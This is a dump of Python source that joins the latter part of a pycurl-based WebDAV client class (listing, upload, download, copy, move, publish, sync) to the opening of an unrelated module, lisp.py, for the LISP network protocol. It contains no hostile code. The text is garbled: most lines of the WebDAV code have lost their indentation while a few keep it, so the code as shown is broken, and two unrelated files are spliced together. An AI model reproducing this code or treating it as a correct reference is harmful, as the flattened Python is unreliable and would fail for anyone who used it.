'clean': ["Accept: */*", "Connection: Keep-Alive"],
'check': ["Accept: */*"],
'info': ["Accept: */*", "Depth: 1"],
'get_metadata': ["Accept: */*", "Depth: 1", "Content-Type: application/x-www-form-urlencoded"],
'set_metadata': ["Accept: */*", "Depth: 1", "Content-Type: application/x-www-form-urlencoded"]
}
def get_header(self, method):
if method in Client.http_header:
try:
header = Client.http_header[method].copy()
except AttributeError:
header = Client.http_header[method][:]
else:
header = list()
if self.webdav.token:
webdav_token = "Authorization: OAuth {token}".format(token=self.webdav.token)
header.append(webdav_token)
return header
requests = {
'copy': "COPY",
'move': "MOVE",
'mkdir': "MKCOL",
'clean': "DELETE",
'check': "HEAD",
'list': "PROPFIND",
'free': "PROPFIND",
'info': "PROPFIND",
'publish': "PROPPATCH",
'unpublish': "PROPPATCH",
'published': "PROPPATCH",
'get_metadata': "PROPFIND",
'set_metadata': "PROPPATCH"
}
meta_xmlns = {
'https://webdav.yandex.ru': "urn:yandex:disk:meta",
}
def __init__(self, options):
webdav_options = get_options(type=WebDAVSettings, from_options=options)
proxy_options = get_options(type=ProxySettings, from_options=options)
self.webdav = WebDAVSettings(webdav_options)
self.proxy = ProxySettings(proxy_options)
        # see __del__
        # libcurl initializes itself automatically the first time it is used,
        # see https://curl.haxx.se/libcurl/c/libcurl.html#GLOBAL
        #pycurl.global_init(pycurl.GLOBAL_DEFAULT)
self.default_options = {}
def __del__(self):
        # global_cleanup() is commented out because it causes problems with
        # Google's gcloud library: it raises ssl.SSLError ('failed to allocate
        # SSL context',) when a new context is created:
        # ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
# ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
# File "/usr/lib/python2.7/ssl.py", line 411, in create_default_context
# context = SSLContext(PROTOCOL_SSLv23)
# File "/usr/lib/python2.7/ssl.py", line 337, in __new__
# self = _SSLContext.__new__(cls, protocol)
# ssl.SSLError: ('failed to allocate SSL context',)
#pycurl.global_cleanup()
pass
    def valid(self):
        return self.webdav.valid() and self.proxy.valid()
def Request(self, options=None):
curl = pycurl.Curl()
self.default_options.update({
'URL': self.webdav.hostname,
'NOBODY': 1,
'SSLVERSION': pycurl.SSLVERSION_TLSv1,
})
if not self.webdav.token:
server_token = '{login}:{password}'.format(login=self.webdav.login, password=self.webdav.password)
self.default_options.update({
'USERPWD': server_token,
})
if self.proxy.valid():
if self.proxy.hostname:
self.default_options['PROXY'] = self.proxy.hostname
if self.proxy.login:
if not self.proxy.password:
self.default_options['PROXYUSERNAME'] = self.proxy.login
else:
proxy_token = '{login}:{password}'.format(login=self.proxy.login, password=self.proxy.password)
self.default_options['PROXYUSERPWD'] = proxy_token
if self.webdav.cert_path:
self.default_options['SSLCERT'] = self.webdav.cert_path
if self.webdav.key_path:
self.default_options['SSLKEY'] = self.webdav.key_path
if self.webdav.recv_speed:
self.default_options['MAX_RECV_SPEED_LARGE'] = self.webdav.recv_speed
if self.webdav.send_speed:
self.default_options['MAX_SEND_SPEED_LARGE'] = self.webdav.send_speed
if self.webdav.verbose:
self.default_options['VERBOSE'] = self.webdav.verbose
if self.webdav.conn_timeout:
self.default_options['CONNECTTIMEOUT_MS'] = self.webdav.conn_timeout
if self.default_options:
add_options(curl, self.default_options)
if options:
add_options(curl, options)
return curl
def list(self, remote_path=root):
        def parse(response):
            try:
                response_str = response.getvalue()
                tree = etree.fromstring(response_str)
                hrefs = [unquote(href.text) for href in tree.findall(".//{DAV:}href")]
                return [Urn(href) for href in hrefs]
            except etree.XMLSyntaxError:
                return list()
try:
directory_urn = Urn(remote_path, directory=True)
if directory_urn.path() != Client.root:
if not self.check(directory_urn.path()):
raise RemoteResourceNotFound(directory_urn.path())
response = BytesIO()
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': directory_urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['list'],
'HTTPHEADER': self.get_header('list'),
'WRITEDATA': response,
'NOBODY': 0
}
request = self.Request(options=options)
request.perform()
request.close()
urns = parse(response)
path = "{root}{path}".format(root=self.webdav.root, path=directory_urn.path())
return [urn.filename() for urn in urns if urn.path() != path and urn.path() != path[:-1]]
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def free(self):
def parse(response):
try:
response_str = response.getvalue()
tree = etree.fromstring(response_str)
node = tree.find('.//{DAV:}quota-available-bytes')
if node is not None:
return int(node.text)
else:
raise MethodNotSupported(name='free', server=self.webdav.hostname)
except TypeError:
raise MethodNotSupported(name='free', server=self.webdav.hostname)
except etree.XMLSyntaxError:
return str()
def data():
root = etree.Element("propfind", xmlns="DAV:")
prop = etree.SubElement(root, "prop")
etree.SubElement(prop, "quota-available-bytes")
etree.SubElement(prop, "quota-used-bytes")
tree = etree.ElementTree(root)
buff = BytesIO()
tree.write(buff)
return buff.getvalue()
try:
response = BytesIO()
options = {
'CUSTOMREQUEST': Client.requests['free'],
'HTTPHEADER': self.get_header('free'),
'POSTFIELDS': data(),
'WRITEDATA': response,
'NOBODY': 0
}
request = self.Request(options=options)
request.perform()
request.close()
return parse(response)
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def check(self, remote_path=root):
try:
urn = Urn(remote_path)
response = BytesIO()
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['check'],
'HTTPHEADER': self.get_header('check'),
'WRITEDATA': response,
'NOBODY': 1
}
request = self.Request(options=options)
request.perform()
code = request.getinfo(pycurl.HTTP_CODE)
request.close()
if int(code) == 200:
return True
return False
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def mkdir(self, remote_path):
try:
directory_urn = Urn(remote_path, directory=True)
if not self.check(directory_urn.parent()):
raise RemoteParentNotFound(directory_urn.path())
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': directory_urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['mkdir'],
'HTTPHEADER': self.get_header('mkdir')
}
request = self.Request(options=options)
request.perform()
request.close()
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def download_to(self, buff, remote_path):
try:
urn = Urn(remote_path)
if self.is_dir(urn.path()):
raise OptionNotValid(name="remote_path", value=remote_path)
if not self.check(urn.path()):
raise RemoteResourceNotFound(urn.path())
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'WRITEFUNCTION': buff.write,
'HTTPHEADER': self.get_header('download_to'),
'NOBODY': 0
}
request = self.Request(options=options)
request.perform()
request.close()
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def download(self, remote_path, local_path, progress=None):
urn = Urn(remote_path)
if self.is_dir(urn.path()):
self.download_directory(local_path=local_path, remote_path=remote_path, progress=progress)
else:
self.download_file(local_path=local_path, remote_path=remote_path, progress=progress)
def download_directory(self, remote_path, local_path, progress=None):
urn = Urn(remote_path, directory=True)
if not self.is_dir(urn.path()):
raise OptionNotValid(name="remote_path", value=remote_path)
if os.path.exists(local_path):
shutil.rmtree(local_path)
os.makedirs(local_path)
for resource_name in self.list(urn.path()):
_remote_path = "{parent}{name}".format(parent=urn.path(), name=resource_name)
_local_path = os.path.join(local_path, resource_name)
self.download(local_path=_local_path, remote_path=_remote_path, progress=progress)
def download_file(self, remote_path, local_path, progress=None):
try:
urn = Urn(remote_path)
if os.path.isdir(local_path):
raise OptionNotValid(name="local_path", value=local_path)
if not self.check(urn.path()):
raise RemoteResourceNotFound(urn.path())
with open(local_path, 'wb') as local_file:
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'HTTPHEADER': self.get_header('download_file'),
'WRITEDATA': local_file,
'NOPROGRESS': 0 if progress else 1,
'NOBODY': 0
}
if progress:
options["PROGRESSFUNCTION"] = progress
request = self.Request(options=options)
request.perform()
request.close()
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def download_sync(self, remote_path, local_path, callback=None):
self.download(local_path=local_path, remote_path=remote_path)
if callback:
callback()
def download_async(self, remote_path, local_path, callback=None):
target = (lambda: self.download_sync(local_path=local_path, remote_path=remote_path, callback=callback))
threading.Thread(target=target).start()
def upload_from(self, buff, remote_path):
try:
urn = Urn(remote_path)
if urn.is_dir():
raise OptionNotValid(name="remote_path", value=remote_path)
if not self.check(urn.parent()):
raise RemoteParentNotFound(urn.path())
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'HTTPHEADER': self.get_header('upload_from'),
'UPLOAD': 1,
'READFUNCTION': buff.read,
}
request = self.Request(options=options)
request.perform()
code = int(request.getinfo(pycurl.HTTP_CODE))
if code == 507:
raise NotEnoughSpace()
request.close()
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def upload(self, remote_path, local_path, progress=None):
if os.path.isdir(local_path):
self.upload_directory(local_path=local_path, remote_path=remote_path, progress=progress)
else:
self.upload_file(local_path=local_path, remote_path=remote_path, progress=progress)
    def upload_directory(self, remote_path, local_path, progress=None):
        urn = Urn(remote_path, directory=True)
        if not urn.is_dir():
            raise OptionNotValid(name="remote_path", value=remote_path)
        if not os.path.exists(local_path):
            raise LocalResourceNotFound(local_path)
        if not os.path.isdir(local_path):
            raise OptionNotValid(name="local_path", value=local_path)
        if self.check(urn.path()):
            self.clean(urn.path())
        self.mkdir(remote_path)
for resource_name in listdir(local_path):
_remote_path = "{parent}{name}".format(parent=urn.path(), name=resource_name)
_local_path = os.path.join(local_path, resource_name)
self.upload(local_path=_local_path, remote_path=_remote_path, progress=progress)
def upload_file(self, remote_path, local_path, progress=None):
try:
if not os.path.exists(local_path):
raise LocalResourceNotFound(local_path)
urn = Urn(remote_path)
if urn.is_dir():
raise OptionNotValid(name="remote_path", value=remote_path)
if os.path.isdir(local_path):
raise OptionNotValid(name="local_path", value=local_path)
if not self.check(urn.parent()):
raise RemoteParentNotFound(urn.path())
with open(local_path, "rb") as local_file:
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'HTTPHEADER': self.get_header('upload_file'),
'UPLOAD': 1,
'READFUNCTION': local_file.read,
'NOPROGRESS': 0 if progress else 1
}
if progress:
options["PROGRESSFUNCTION"] = progress
file_size = os.path.getsize(local_path)
if file_size > self.large_size:
options['INFILESIZE_LARGE'] = file_size
else:
options['INFILESIZE'] = file_size
request = self.Request(options=options)
request.perform()
code = int(request.getinfo(pycurl.HTTP_CODE))
if code == 507:
raise NotEnoughSpace()
if code == 500:
raise InternalServerError()
if code < 200 or code >=400:
raise UnhandledError()
request.close()
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def upload_sync(self, remote_path, local_path, callback=None):
self.upload(local_path=local_path, remote_path=remote_path)
if callback:
callback()
def upload_async(self, remote_path, local_path, callback=None):
target = (lambda: self.upload_sync(local_path=local_path, remote_path=remote_path, callback=callback))
threading.Thread(target=target).start()
def copy(self, remote_path_from, remote_path_to):
def header(remote_path_to):
path = Urn(remote_path_to).path()
destination = "{root}{path}".format(root=self.webdav.root, path=path)
header_item = "Destination: {destination}".format(destination=destination)
header = self.get_header('copy')
header.append(header_item)
return header
try:
urn_from = Urn(remote_path_from)
if not self.check(urn_from.path()):
raise RemoteResourceNotFound(urn_from.path())
urn_to = Urn(remote_path_to)
if not self.check(urn_to.parent()):
raise RemoteParentNotFound(urn_to.path())
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn_from.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['copy'],
'HTTPHEADER': header(remote_path_to)
}
request = self.Request(options=options)
request.perform()
request.close()
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def move(self, remote_path_from, remote_path_to):
def header(remote_path_to):
path = Urn(remote_path_to).path()
destination = "{root}{path}".format(root=self.webdav.root, path=path)
header_item = "Destination: {destination}".format(destination=destination)
header = self.get_header('move')
header.append(header_item)
return header
try:
urn_from = Urn(remote_path_from)
if not self.check(urn_from.path()):
raise RemoteResourceNotFound(urn_from.path())
urn_to = Urn(remote_path_to)
if not self.check(urn_to.parent()):
raise RemoteParentNotFound(urn_to.path())
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn_from.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['move'],
'HTTPHEADER': header(remote_path_to)
}
request = self.Request(options=options)
request.perform()
request.close()
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def clean(self, remote_path):
try:
urn = Urn(remote_path)
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['clean'],
'HTTPHEADER': self.get_header('clean')
}
request = self.Request(options=options)
request.perform()
request.close()
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def publish(self, remote_path):
def parse(response):
try:
response_str = response.getvalue()
tree = etree.fromstring(response_str)
result = tree.xpath("//*[local-name() = 'public_url']")
public_url = result[0]
return public_url.text
except IndexError:
raise MethodNotSupported(name="publish", server=self.webdav.hostname)
except etree.XMLSyntaxError:
return ""
def data(for_server):
root_node = etree.Element("propertyupdate", xmlns="DAV:")
set_node = etree.SubElement(root_node, "set")
prop_node = etree.SubElement(set_node, "prop")
xmlns = Client.meta_xmlns.get(for_server, "")
public_url = etree.SubElement(prop_node, "public_url", xmlns=xmlns)
public_url.text = "true"
tree = etree.ElementTree(root_node)
buff = BytesIO()
tree.write(buff)
return buff.getvalue()
try:
urn = Urn(remote_path)
if not self.check(urn.path()):
raise RemoteResourceNotFound(urn.path())
response = BytesIO()
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['publish'],
'HTTPHEADER': self.get_header('publish'),
'POSTFIELDS': data(for_server=self.webdav.hostname),
'WRITEDATA': response,
'NOBODY': 0
}
request = self.Request(options=options)
request.perform()
request.close()
return parse(response)
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def unpublish(self, remote_path):
def data(for_server):
root = etree.Element("propertyupdate", xmlns="DAV:")
remove = etree.SubElement(root, "remove")
prop = etree.SubElement(remove, "prop")
xmlns = Client.meta_xmlns.get(for_server, "")
etree.SubElement(prop, "public_url", xmlns=xmlns)
tree = etree.ElementTree(root)
buff = BytesIO()
tree.write(buff)
return buff.getvalue()
try:
urn = Urn(remote_path)
if not self.check(urn.path()):
raise RemoteResourceNotFound(urn.path())
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['unpublish'],
'HTTPHEADER': self.get_header('unpublish'),
'POSTFIELDS': data(for_server=self.webdav.hostname)
}
request = self.Request(options=options)
request.perform()
request.close()
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def info(self, remote_path):
def parse(response, path):
try:
response_str = response.getvalue()
tree = etree.fromstring(response_str)
find_attributes = {
'created': ".//{DAV:}creationdate",
'name': ".//{DAV:}displayname",
'size': ".//{DAV:}getcontentlength",
'modified': ".//{DAV:}getlastmodified"
}
resps = tree.findall("{DAV:}response")
for resp in resps:
href = resp.findtext("{DAV:}href")
urn = unquote(href)
if path[-1] == Urn.separate:
if not path == urn:
continue
else:
path_with_sep = "{path}{sep}".format(path=path, sep=Urn.separate)
if not path == urn and not path_with_sep == urn:
continue
info = dict()
for (name, value) in find_attributes.items():
info[name] = resp.findtext(value)
return info
raise RemoteResourceNotFound(path)
except etree.XMLSyntaxError:
raise MethodNotSupported(name="info", server=self.webdav.hostname)
try:
urn = Urn(remote_path)
response = BytesIO()
if not self.check(urn.path()) and not self.check(Urn(remote_path, directory=True).path()):
raise RemoteResourceNotFound(remote_path)
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['info'],
'HTTPHEADER': self.get_header('info'),
'WRITEDATA': response,
'NOBODY': 0
}
request = self.Request(options=options)
request.perform()
request.close()
path = "{root}{path}".format(root=self.webdav.root, path=urn.path())
return parse(response, path)
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def is_dir(self, remote_path):
def parse(response, path):
try:
response_str = response.getvalue()
tree = etree.fromstring(response_str)
resps = tree.findall("{DAV:}response")
for resp in resps:
href = resp.findtext("{DAV:}href")
urn = unquote(href)
if path[-1] == Urn.separate:
if not path == urn:
continue
else:
path_with_sep = "{path}{sep}".format(path=path, sep=Urn.separate)
if not path == urn and not path_with_sep == urn:
continue
                    resource_type = resp.find(".//{DAV:}resourcetype")
                    if resource_type is None:
                        raise MethodNotSupported(name="is_dir", server=self.webdav.hostname)
                    dir_type = resource_type.find("{DAV:}collection")
                    return dir_type is not None
raise RemoteResourceNotFound(path)
except etree.XMLSyntaxError:
raise MethodNotSupported(name="is_dir", server=self.webdav.hostname)
try:
urn = Urn(remote_path)
parent_urn = Urn(urn.parent())
if not self.check(urn.path()) and not self.check(Urn(remote_path, directory=True).path()):
raise RemoteResourceNotFound(remote_path)
response = BytesIO()
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': parent_urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['info'],
'HTTPHEADER': self.get_header('info'),
'WRITEDATA': response,
'NOBODY': 0
}
request = self.Request(options=options)
request.perform()
request.close()
path = "{root}{path}".format(root=self.webdav.root, path=urn.path())
return parse(response, path)
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def resource(self, remote_path):
urn = Urn(remote_path)
return Resource(self, urn.path())
def get_property(self, remote_path, option):
def parse(response, option):
response_str = response.getvalue()
tree = etree.fromstring(response_str)
xpath = "{xpath_prefix}{xpath_exp}".format(xpath_prefix=".//", xpath_exp=option['name'])
return tree.findtext(xpath)
def data(option):
root = etree.Element("propfind", xmlns="DAV:")
prop = etree.SubElement(root, "prop")
etree.SubElement(prop, option.get('name', ""), xmlns=option.get('namespace', ""))
tree = etree.ElementTree(root)
buff = BytesIO()
tree.write(buff)
return buff.getvalue()
try:
urn = Urn(remote_path)
if not self.check(urn.path()):
raise RemoteResourceNotFound(urn.path())
response = BytesIO()
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['get_metadata'],
'HTTPHEADER': self.get_header('get_metadata'),
'POSTFIELDS': data(option),
'WRITEDATA': response,
'NOBODY': 0
}
request = self.Request(options=options)
request.perform()
request.close()
return parse(response, option)
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def set_property(self, remote_path, option):
def data(option):
root_node = etree.Element("propertyupdate", xmlns="DAV:")
root_node.set('xmlns:u', option.get('namespace', ""))
set_node = etree.SubElement(root_node, "set")
prop_node = etree.SubElement(set_node, "prop")
opt_node = etree.SubElement(prop_node, "{namespace}:{name}".format(namespace='u', name=option['name']))
opt_node.text = option.get('value', "")
tree = etree.ElementTree(root_node)
buff = BytesIO()
tree.write(buff)
return buff.getvalue()
try:
urn = Urn(remote_path)
if not self.check(urn.path()):
raise RemoteResourceNotFound(urn.path())
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['set_metadata'],
                'HTTPHEADER': self.get_header('set_metadata'),
'POSTFIELDS': data(option)
}
request = self.Request(options=options)
request.perform()
request.close()
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def push(self, remote_directory, local_directory):
def prune(src, exp):
return [sub(exp, "", item) for item in src]
urn = Urn(remote_directory, directory=True)
if not self.is_dir(urn.path()):
raise OptionNotValid(name="remote_path", value=remote_directory)
        if not os.path.exists(local_directory):
            raise LocalResourceNotFound(local_directory)
        if not os.path.isdir(local_directory):
            raise OptionNotValid(name="local_path", value=local_directory)
paths = self.list(urn.path())
expression = "{begin}{end}".format(begin="^", end=urn.path())
remote_resource_names = prune(paths, expression)
for local_resource_name in listdir(local_directory):
local_path = os.path.join(local_directory, local_resource_name)
remote_path = "{remote_directory}{resource_name}".format(remote_directory=urn.path(), resource_name=local_resource_name)
if os.path.isdir(local_path):
if not self.check(remote_path=remote_path):
self.mkdir(remote_path=remote_path)
self.push(remote_directory=remote_path, local_directory=local_path)
else:
if local_resource_name in remote_resource_names:
continue
self.upload_file(remote_path=remote_path, local_path=local_path)
def pull(self, remote_directory, local_directory):
def prune(src, exp):
return [sub(exp, "", item) for item in src]
urn = Urn(remote_directory, directory=True)
if not self.is_dir(urn.path()):
raise OptionNotValid(name="remote_path", value=remote_directory)
if not os.path.exists(local_directory):
raise LocalResourceNotFound(local_directory)
local_resource_names = listdir(local_directory)
paths = self.list(urn.path())
        expression = "{begin}{end}".format(begin="^", end=urn.path())
remote_resource_names = prune(paths, expression)
for remote_resource_name in remote_resource_names:
local_path = os.path.join(local_directory, remote_resource_name)
remote_path = "{remote_directory}{resource_name}".format(remote_directory=urn.path(), resource_name=remote_resource_name)
remote_urn = Urn(remote_path)
if self.is_dir(remote_urn.path()):
if not os.path.exists(local_path):
os.mkdir(local_path)
self.pull(remote_directory=remote_path, local_directory=local_path)
else:
if remote_resource_name in local_resource_names:
continue
self.download_file(remote_path=remote_path, local_path=local_path)
def sync(self, remote_directory, local_directory):
self.pull(remote_directory=remote_directory, local_directory=local_directory)
self.push(remote_directory=remote_directory, local_directory=local_directory)
class Resource(object):
def __init__(self, client, urn):
self.client = client
self.urn = urn
def __str__(self):
return "resource {path}".format(path=self.urn.path())
def is_dir(self):
return self.client.is_dir(self.urn.path())
def rename(self, new_name):
old_path = self.urn.path()
parent_path = self.urn.parent()
new_name = Urn(new_name).filename()
new_path = "{directory}{filename}".format(directory=parent_path, filename=new_name)
self.client.move(remote_path_from=old_path, remote_path_to=new_path)
self.urn = Urn(new_path)
def move(self, remote_path):
new_urn = Urn(remote_path)
self.client.move(remote_path_from=self.urn.path(), remote_path_to=new_urn.path())
self.urn = new_urn
def copy(self, remote_path):
urn = Urn(remote_path)
self.client.copy(remote_path_from=self.urn.path(), remote_path_to=remote_path)
return Resource(self.client, urn)
def info(self, params=None):
info = self.client.info(self.urn.path())
if not params:
return info
return {key: value for (key, value) in info.items() if key in params}
def clean(self):
return self.client.clean(self.urn.path())
def check(self):
return self.client.check(self.urn.path())
def read_from(self, buff):
self.client.upload_from(buff=buff, remote_path=self.urn.path())
def read(self, local_path):
return self.client.upload_sync(local_path=local_path, remote_path=self.urn.path())
def read_async(self, local_path, callback=None):
return self.client.upload_async(local_path=local_path, remote_path=self.urn.path(), callback=callback)
def write_to(self, buff):
return self.client.download_to(buff=buff, remote_path=self.urn.path())
def write(self, local_path):
return self.client.download_sync(local_path=local_path, remote_path=self.urn.path())
def write_async(self, local_path, callback=None):
return self.client.download_async(local_path=local_path, remote_path=self.urn.path(), callback=callback)
def publish(self):
return self.client.publish(self.urn.path())
def unpublish(self):
return self.client.unpublish(self.urn.path())
    # Note: a Python property cannot take arguments, so the WebDAV properties
    # are exposed as plain getter/setter methods here; the original
    # @property/@property.setter pair was not callable.
    def get_property(self, option):
        return self.client.get_property(remote_path=self.urn.path(), option=option)

    def set_property(self, option, value):
        option['value'] = value.__str__()
        self.client.set_property(remote_path=self.urn.path(), option=option)
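
# Minimal usage sketch (illustrative, not part of the library): assumes a
# reachable WebDAV server and valid credentials; the "webdav_"-prefixed keys
# follow the option convention resolved by get_options() above.
if __name__ == "__main__":
    demo_options = {
        'webdav_hostname': "https://webdav.example.com",
        'webdav_login': "user",
        'webdav_password': "secret",
    }
    demo_client = Client(demo_options)
    if demo_client.valid():
        print(demo_client.list())                    # resource names under root
        demo_client.upload(remote_path="/backup/", local_path="./backup")
        demo_resource = demo_client.resource("/backup/notes.txt")
        print(demo_resource.info(params=["size", "modified"]))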
|
lisp.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy.distance import vincenty
import curve25519

use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)
lisp_print_rloc_probe_list = False

lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True

lisp_map_notify_queue = {}
lisp_map_servers_list = {}
lisp_ddt_map_requestQ = {}
lisp_db_list = []
lisp_group_mapping_list = {}
lisp_map_resolvers_list = {}
lisp_rtr_list = {}
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}

lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []

lisp_test_mr_timer = None
lisp_rloc_probe_timer = None

lisp_registered_count = 0

lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}

lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
lisp_data_plane_security = False
lisp_search_decap_keys = True

lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False

lisp_crypto_ephem_port = None

lisp_pitr = False

lisp_l2_overlay = False

lisp_rloc_probing = False
lisp_rloc_probe_list = {}

lisp_register_all_rtrs = True

lisp_nonce_echoing = False
lisp_nonce_echo_list = {}
lisp_nat_traversal = False

lisp_program_hardware = False

lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"

lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"

lisp_ipc_lock = None

lisp_default_iid = 0
lisp_default_secondary_iid = 0

lisp_ms_rtr_list = []

lisp_nat_state_info = {}

lisp_last_map_request_sent = None
lisp_no_map_request_rate_limit = time.time()

lisp_last_icmp_too_big_sent = 0

LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []

lisp_policies = {}

lisp_load_split_pings = False

lisp_eid_hashes = []

lisp_reassembly_queue = {}

lisp_pubsub_cache = {}

lisp_decent_push_configured = False

lisp_decent_modulus = 0
lisp_decent_dns_suffix = None

lisp_ipc_socket = None

lisp_ms_encryption_keys = {}
lisp_ms_json_keys = {}

lisp_rtr_nat_trace_cache = {}

lisp_glean_mappings = []

lisp_gleaned_groups = {}

lisp_icmp_raw_socket = None
if (os.getenv("LISP_SEND_ICMP_TOO_BIG") != None):
    lisp_icmp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
        socket.IPPROTO_ICMP)
    lisp_icmp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)

lisp_ignore_df_bit = (os.getenv("LISP_IGNORE_DF_BIT") != None)
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9

LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5

lisp_map_reply_action_string = ["no-action", "native-forward",
    "send-map-request", "drop-action", "policy-denied", "auth-failure"]

LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32

LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
